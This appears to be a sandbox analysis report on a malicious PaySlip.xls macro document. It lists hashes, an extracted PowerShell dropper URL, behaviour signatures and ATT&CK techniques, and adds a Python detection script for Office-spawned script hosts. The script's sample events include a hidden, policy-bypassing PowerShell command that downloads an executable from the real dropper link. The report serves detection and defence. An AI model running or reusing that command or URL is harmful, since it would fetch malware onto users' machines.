General

  • Target

    PaySlip.xls

  • Size

    157KB

  • Sample

    210119-8ygpqxqywj

  • MD5

    3202c4586c4991c9f5312238f7577d8e

  • SHA1

    10291ff94dbce8eda7aa9ede69bf984a084b8b9e

  • SHA256

    3f97ea67ea560c851c589e4b7161f60ece5c390a9e194818b30987b212434c06

  • SHA512

    ebe2a28ac003935a61b9795b39aa34324d275aed8340263d9566b6068cbe813e979f28b6243d9115bbd2d23988a161129675aaa33281b855399b15ffb4aa1691

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs (exe.dropper)

    https://cutt.ly/fjYtydH

    cutt.ly is a public link shortener, so this URL is only the first hop: the host that actually serves the dropped executable is not recorded in this report and has to be resolved by following the redirect from an isolated analysis host.

Targets

    • Target

      PaySlip.xls

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request
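
The two signatures above, together with the extracted dropper URL, describe the detection a SOC would write for this sample: an Office parent spawning a script host, and that script host reaching out to the network. The block below is an added example, not part of this report or of the sandbox's own signature logic. It runs that logic over constructed process-creation and network-connection events in the shape of Sysmon Event ID 1 and 3 records; the executable lists, rule names and the sample command line are assumptions, and only the URL https://cutt.ly/fjYtydH is taken from the report.

```python
"""Detect the two behaviours flagged on PaySlip.xls: an Office process
spawning an unexpected child, and a blocklisted process making a network
request. Added example; the lists below are assumptions, not the sandbox's."""

import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Office hosts that should never spawn script hosts or LOLBins (assumption).
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Children whose appearance under an Office parent indicates macro or
# exploit abuse (assumption).
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Processes whose outbound connections are treated as blocklisted. The report
# does not name the process it flagged, so this list is an assumption.
BLOCKLISTED_NET = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe",
    "certutil.exe", "bitsadmin.exe", "regsvr32.exe",
}

# Pull URLs out of a command line so the stage-1 URL becomes a searchable IOC.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class Event:
    kind: str          # "process" (Sysmon EID 1) or "network" (Sysmon EID 3)
    image: str         # executable that performed the action
    parent: str = ""   # parent executable, process events only
    cmdline: str = ""  # command line, process events only
    dest: str = ""     # destination host:port, network events only


def _base(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[Event]) -> List[Dict]:
    """Return one finding per event that matches either rule, in event order."""
    findings: List[Dict] = []
    for ev in events:
        image = _base(ev.image)
        if ev.kind == "process":
            parent = _base(ev.parent)
            if parent in OFFICE_PARENTS and image in SUSPICIOUS_CHILDREN:
                findings.append({
                    "rule": "office_spawned_unexpected_child",
                    "parent": parent,
                    "image": image,
                    "iocs": URL_RE.findall(ev.cmdline),
                })
        elif ev.kind == "network" and image in BLOCKLISTED_NET:
            findings.append({
                "rule": "blocklisted_process_network_request",
                "image": image,
                "iocs": [ev.dest],
            })
    return findings


# Constructed events modelled on this sample. The PowerShell command line is a
# placeholder written for the example; the report only shows the URL.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\explorer.exe",
          parent=r"C:\Windows\System32\userinit.exe", cmdline="explorer.exe"),
    Event("process", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
          parent=r"C:\Windows\explorer.exe", cmdline='"EXCEL.EXE" PaySlip.xls'),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
          cmdline='powershell -w hidden -ep bypass -c "iwr https://cutt.ly/fjYtydH -OutFile $env:TEMP\\a.exe"'),
    Event("network", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          dest="cutt.ly:443"),
    Event("network", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          dest="www.example.com:443"),
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

Running the block prints two findings: the EXCEL.EXE to powershell.exe spawn with the shortener URL extracted from the command line, and the powershell.exe connection to cutt.ly. The benign explorer.exe and chrome.exe events produce nothing, which is the point of keying on parent and image names rather than on any network activity.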

MITRE ATT&CK Matrix (ATT&CK v6)

Defense Evasion

  • Modify Registry (T1112): 1 hit

Discovery

  • Query Registry (T1012): 2 hits

  • System Information Discovery (T1082): 2 hits
